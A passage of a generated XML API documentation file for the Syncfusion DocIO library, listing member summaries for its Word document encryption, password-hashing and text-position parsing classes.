        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_tableStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_dataStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_mainStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_fib">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_bIsComplexFile">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_key">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor"/> [ERROR: invalid expression DeclaringTypeKind].
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.#ctor(System.IO.MemoryStream,System.IO.MemoryStream,System.IO.MemoryStream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor"/> class.
            </summary>
            <param name="tableStream">The table stream.</param>
            <param name="mainStream">The main stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.TestEncrypt(System.IO.MemoryStream@,System.String,System.Byte[]@,System.Byte[]@,System.Byte[]@)">
            <summary>
            Tests the encrypt.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.TestDecrypt(System.IO.MemoryStream@,System.String,System.Byte[]@,System.Byte[]@,System.Byte[]@)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="password"></param>
            <param name="docid"></param>
            <param name="point"></param>
            <param name="hash"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.CheckPassword(System.String)">
            <summary>
            Checks the password.
            </summary>
            <param name="password">The password.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.Decrypt">
            <summary>
            Decrypts our streams.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.Encrypt(System.String)">
            <summary>
            Decrypts our streams.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.DecryptStream(System.IO.MemoryStream)">
            <summary>
            Decrypts the stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="isMainStream">if set to <c>true</c> [is main stream].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.Swap(System.Byte@,System.Byte@)">
            <summary>
            Swaps a and b.
            </summary>
            <param name="a">a.</param>
            <param name="b">b.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.ConvertPassword(System.String)">
            <summary>
            Converts the password.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.PrepareKey(System.Byte[])">
            <summary>
            Prepares the key.
            </summary>
            <param name="data">The data.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.MakeKey(System.UInt32)">
            <summary>
            Makes the key.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.MemoryCompare(System.Byte[],System.Byte[],System.Int32)">
            <summary>
            Compares memory blocks
            </summary>
            <param name="block1">The block1.</param>
            <param name="block2">The block2.</param>
            <param name="length">The length.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.VerifyPassword">
            <summary>
            Verifies the password.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.PrepareValContext">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.DecryptBuffer(System.Byte[],System.Int32)">
            <summary>
            Decripts buffer
            </summary>
            <param name="data">The data.</param>
            <param name="length">The length.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.GetPasswordHash(System.String)">
            <summary>
            Gets the password hash.
            </summary>
            <param name="password">The password.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.RevertBytes(System.UInt32)">
            <summary>
            Reverts the bytes.
            </summary>
            <param name="changeVal">The change val.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.GetHighOrderHash(System.String)">
            <summary>
            Gets the high order hash.
            </summary>
            <param name="password">The password.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.GetLowOrderHash(System.String)">
            <summary>
            Gets the low order password hash.
            </summary>
            <param name="password">Password to hash.</param>
            <returns>Hash value for the password string.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.GetCharBits7(System.Char)">
            <summary>
            
            </summary>
            <param name="charToConvert"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.GetCharBits15(System.Char)">
            <summary>
            Converts character to 15 bits sequence
            </summary>
            <param name="charToConvert">Character to convert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.GetUInt16FromBits(System.Boolean[])">
            <summary>
            Converts bits array to UInt16 value.
            </summary>
            <param name="bits">Array to convert.</param>
            <returns>Converted UInt16 value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.RotateBits(System.Boolean[],System.Int32)">
            <summary>
            Rotates (cyclic shift) bits in the array specified number of times
            </summary>
            <param name="bits">Array to rotate</param>
            <param name="count">Number of times to rotate</param>
            <returns>Rotated array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.Round(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="value"></param>
            <param name="degree"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.TableStream">
            <summary>
            Gets the table stream.
            </summary>
            <value>The table stream.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.MainStream">
            <summary>
            Gets the main stream.
            </summary>
            <value>The main stream.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.DataStream">
            <summary>
            Gets the data stream
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.WordKey">
            <summary>
            Summary description for Word_key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordKey.m_baState">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordKey.m_bX">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordKey.m_bY">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.WordKey.status">
            <summary>
            Gets or sets the status.
            </summary>
            <value>The status.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.WordKey.x">
            <summary>
            Gets or sets the x.
            </summary>
            <value>The x.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.WordKey.y">
            <summary>
            Gets or sets the y.
            </summary>
            <value>The y.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor">
            <summary>
            Represents the xml encryption descriptor for Encryption/Decryption of Word 2010/2013 documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.m_keyData">
            <summary>
            Specifies the key data used for Encryption/Decryption.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.m_dataIntegrity">
            <summary>
            Specifies the data integrity used for Encryption/Decryption.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.m_keyEncryptors">
            <summary>
            Specifies the key encryptors used for Encryption/Decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.Parse(System.IO.Stream)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.CreateWriter(System.IO.Stream)">
            <summary>
            Create xml writer
            </summary>
            <param name="data">The stream</param>
            <returns>returns the xml writer</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.KeyData">
            <summary>
            Gets or sets the key data.
            </summary>
            <value>The key data.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.DataIntegrity">
            <summary>
            Gets or sets the data integrity.
            </summary>
            <value>The data integrity.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.XmlEncryptionDescriptor.KeyEncryptors">
            <summary>
            Gets or sets the key encryptors.
            </summary>
            <value>The key encryptors.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.KeyData">
            <summary>
            Represents the key data for Encryption/Decryption of Word 2010 documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_iSaltSize">
            <summary>
            Specifies the number of bytes used by salt.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_iBlockSize">
            <summary>
            Specifies the number of bytes used to encrypt one block of data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_iKeyBits">
            <summary>
            Specifies the number of bits used by encryption algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_iHashSize">
            <summary>
            Specifies the number of bytes used by hash value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_sCipherAlgorithm">
            <summary>
            Specifies the cipher algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_sCipherChaining">
            <summary>
            Specifies the chaining mode used by the cipher algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_sHashAlgorithm">
            <summary>
            Specifies the hashing algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyData.m_arrSalt">
            <summary>
            Specifies the salt value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.KeyData.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.KeyData.Parse(System.Xml.XmlReader)">
            <summary>
            Parses the specified reader.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.KeyData.Serialize(System.Xml.XmlWriter)">
            <summary>
            Serializes the specified writer.
            </summary>
            <param name="writer">The writer.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.SaltSize">
            <summary>
            Gets or sets the size of the salt.
            </summary>
            <value>The size of the salt.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.BlockSize">
            <summary>
            Gets or sets the size of the block.
            </summary>
            <value>The size of the block.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.KeyBits">
            <summary>
            Gets or sets the key bits.
            </summary>
            <value>The key bits.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.HashSize">
            <summary>
            Gets or sets the size of the hash.
            </summary>
            <value>The size of the hash.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.CipherAlgorithm">
            <summary>
            Gets or sets the cipher algorithm.
            </summary>
            <value>The cipher algorithm.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.CipherChaining">
            <summary>
            Gets or sets the cipher chaining.
            </summary>
            <value>The cipher chaining.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.HashAlgorithm">
            <summary>
            Gets or sets the hash algorithm.
            </summary>
            <value>The hash algorithm.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyData.Salt">
            <summary>
            Gets or sets the salt.
            </summary>
            <value>The salt.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity">
            <summary>
            Represents the data integrity for Encryption/Decryption of Word 2010 documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.m_encryptedHmacKey">
            <summary>
            Specifies an encrypted key used for generating the encryptedHmacValue.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.m_encryptedHmacValue">
            <summary>
            Specifies an HMAC derived from the encryptedHmacKey and the encrypted data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.Parse(System.Xml.XmlReader)">
            <summary>
            Parses the specified reader.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.Serialize(System.Xml.XmlWriter)">
            <summary>
            Serializes the specified writer.
            </summary>
            <param name="writer">The writer.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.EncryptedHmacKey">
            <summary>
            Gets or sets the encrypted hmac key.
            </summary>
            <value>The encrypted hmac key.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataIntegrity.EncryptedHmacValue">
            <summary>
            Gets or sets the encrypted hmac value.
            </summary>
            <value>The encrypted hmac value.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.KeyEncryptors">
            <summary>
            Represents the key encryptors for Encryption/Decryption of Word 2010 documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.KeyEncryptors.m_encryptedKey">
            <summary>
            Specifies encrypted key used for Encryption/Decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.KeyEncryptors.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.KeyEncryptors.Parse(System.Xml.XmlReader)">
            <summary>
            Parses the specified reader.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.KeyEncryptors.Serialize(System.Xml.XmlWriter)">
            <summary>
            Serializes the specified writer.
            </summary>
            <param name="writer">The writer.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.KeyEncryptors.EncryptedKey">
            <summary>
            Gets or sets the encrypted key.
            </summary>
            <value>The encrypted key.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey">
            <summary>
            Represents the encrypted key for Encryption/Decryption of Word 2010 documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_iSpinCount">
            <summary>
            Specifies the spin count
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_iSaltSize">
            <summary>
            Specifies the number of bytes used by salt.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_iBlockSize">
            <summary>
            Specifies the number of bytes used to encrypt one block of data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_iKeyBits">
            <summary>
            Specifies the number of bits used by encryption algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_iHashSize">
            <summary>
            Specifies the number of bytes used by hash value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_sCipherAlgorithm">
            <summary>
            Specifies the cipher algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_sCipherChaining">
            <summary>
            Specifies the chaining mode used by the cipher algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_sHashAlgorithm">
            <summary>
            Specifies the hashing algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_arrSalt">
            <summary>
            Specifies the salt value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_encryptedVerifierHashInput">
            <summary>
            Specifies the encrypted verifier hash input used in password verification.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_encryptedVerifierHashValue">
            <summary>
            Specifies the encrypted verifier hash value used in password verification.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.m_encryptedKeyValue">
            <summary>
            Specifies the encrypted form of the intermediate key.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.Parse(System.Xml.XmlReader)">
            <summary>
            Parses the specified reader.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.Serialize(System.Xml.XmlWriter)">
            <summary>
            Serializes the specified writer.
            </summary>
            <param name="writer">The writer.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.SpinCount">
            <summary>
            Gets or sets the spin count.
            </summary>
            <value>The spin count.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.SaltSize">
            <summary>
            Gets or sets the size of the salt.
            </summary>
            <value>The size of the salt.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.BlockSize">
            <summary>
            Gets or sets the size of the block.
            </summary>
            <value>The size of the block.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.KeyBits">
            <summary>
            Gets or sets the key bits.
            </summary>
            <value>The key bits.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.HashSize">
            <summary>
            Gets or sets the size of the hash.
            </summary>
            <value>The size of the hash.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.CipherAlgorithm">
            <summary>
            Gets or sets the cipher algorithm.
            </summary>
            <value>The cipher algorithm.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.CipherChaining">
            <summary>
            Gets or sets the cipher chaining.
            </summary>
            <value>The cipher chaining.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.HashAlgorithm">
            <summary>
            Gets or sets the hash algorithm.
            </summary>
            <value>The hash algorithm.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.Salt">
            <summary>
            Gets or sets the salt.
            </summary>
            <value>The salt.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.EncryptedVerifierHashInput">
            <summary>
            Gets or sets the encrypted verifier hash input.
            </summary>
            <value>The encrypted verifier hash input.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.EncryptedVerifierHashValue">
            <summary>
            Gets or sets the encrypted verifier hash value.
            </summary>
            <value>The encrypted verifier hash value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey.EncryptedKeyValue">
            <summary>
            Gets or sets the encrypted key value.
            </summary>
            <value>The encrypted key value.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.MainStatePositions">
            <summary>
            Summary description for MainStatePositions.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.StatePositionsBase">
            <summary>
            Summary description for StatePositionsBase.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iStartItemPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iEndItemPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iItemIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iEndCHPxPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iEndPAPxPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iEndPieceTablePos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iStartText">
            <summary>
            The position of first byte of text run.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iEndText">
            <summary>
            The position of last byte of text run.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_fkp">
            <summary>
            FKP data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_bookmarks">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_curTextPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.m_iCurrentPapxFKPIndex">
            <summary>
            Currents papx/chpx page indexs
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.InitStartEndPos">
            <summary>
            Initialize start/end positions of text run
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.NextChpx">
            <summary>
            Move to next character properties exception
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.NextPapx">
            <summary>
            Move to next paragraph properties exception
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.GetMinEndPos(System.Int64)">
            <summary>
            Get min end pos from chpx and papx
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.UpdateCHPxEndPos(System.Int64)">
            <summary>
            Update end position of chpx
            </summary>
            <param name="iEndPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.UpdatePAPxEndPos(System.Int64)">
            <summary>
            Update end position of papx
            </summary>
            <param name="iEndPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.IsFirstPass(System.Int64)">
            <summary>
            Is it first pass in text run
            </summary>
            <param name="iPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.IsEndOfText(System.Int64)">
            <summary>
            Is it end of text
            </summary>
            <param name="iPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.UpdateItemEndPos(System.Int64)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.IsEndOfSubdocItemText(System.Int64)">
            <summary>
             Check if current position is less then subdocument item text end.
            </summary>
            <param name="iPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.MoveToCurrentChpxPapx">
            <summary>
            Initializes chpx/papx
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.StartItemPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.EndItemPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.ItemIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.StartText">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.CurrentChpx">
            <summary>
            Gets current chpx
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.CurrentPapx">
            <summary>
            Gets current papx
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.CurrentTextPosition">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.Tables">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.IsCurrentPapxPosition">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.IsCurrentChpxPosition">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.CurrentChpxPage">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StatePositionsBase.CurrentPapxPage">
            <summary>
            Gets current papx page
            </summary>
            <returns></returns>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MainStatePositions.m_iEndSecPos">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MainStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Creates object and fills it's members from fkp
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MainStatePositions.NextSepx(System.Int32@)">
            <summary>
            Move to next section properties exception
            </summary>
            <param name="iEndPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MainStatePositions.UpdateSepxEndPos(System.Int64)">
            <summary>
            Update end position of section
            </summary>
            <param name="iEndPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MainStatePositions.InitStartEndPos">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MainStatePositions.GetMinEndPos(System.Int64)">
            <summary>
            Gets min end position
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.MainStatePositions.SectionIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.MainStatePositions.CurrentSepx">
            <summary>
            Gets current section properties exception
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.FootnoteStatePositions">
            <summary>
            Summary description for HFStatePositions
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnoteStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnoteStatePositions.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnoteStatePositions.UpdateItemEndPos(System.Int64)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.HFStatePositions">
            <summary>
            Summary description for HFStatePositions
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.HFStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
             Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.HFStatePositions.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.HFStatePositions.MoveToNextHeaderPos">
            <summary>
            Move to next header/footer position
            </summary>
        </member>
